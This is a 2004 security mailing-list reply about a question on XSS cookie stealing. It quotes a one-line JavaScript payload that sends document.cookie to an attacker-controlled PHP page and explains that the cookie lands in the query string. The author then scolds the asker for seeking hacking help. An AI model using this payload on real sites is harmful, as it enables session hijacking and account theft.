WebApp Sec mailing list archives

RE: xss php cookie-stealing code

From: "V. Poddubnyy" <vpoddubniy () mail ru>
Date: Tue, 28 Sep 2004 09:10:35 +0400

Hello,

And what do you write in your javascript?

If smth. like this:

window.location = 'http://mysite/myphp.php?cookie=&apos; + document.cookie;

Then your cookie will be stored in the Query_string, in 'cookie' variable...
So, the cookie is stored where you stored it...

--

And I think this is not a good list for asking such questions. This looks
like asking for assiatance in hacking, not in security.

--
Best regards,
 Vladimir Poddubnyy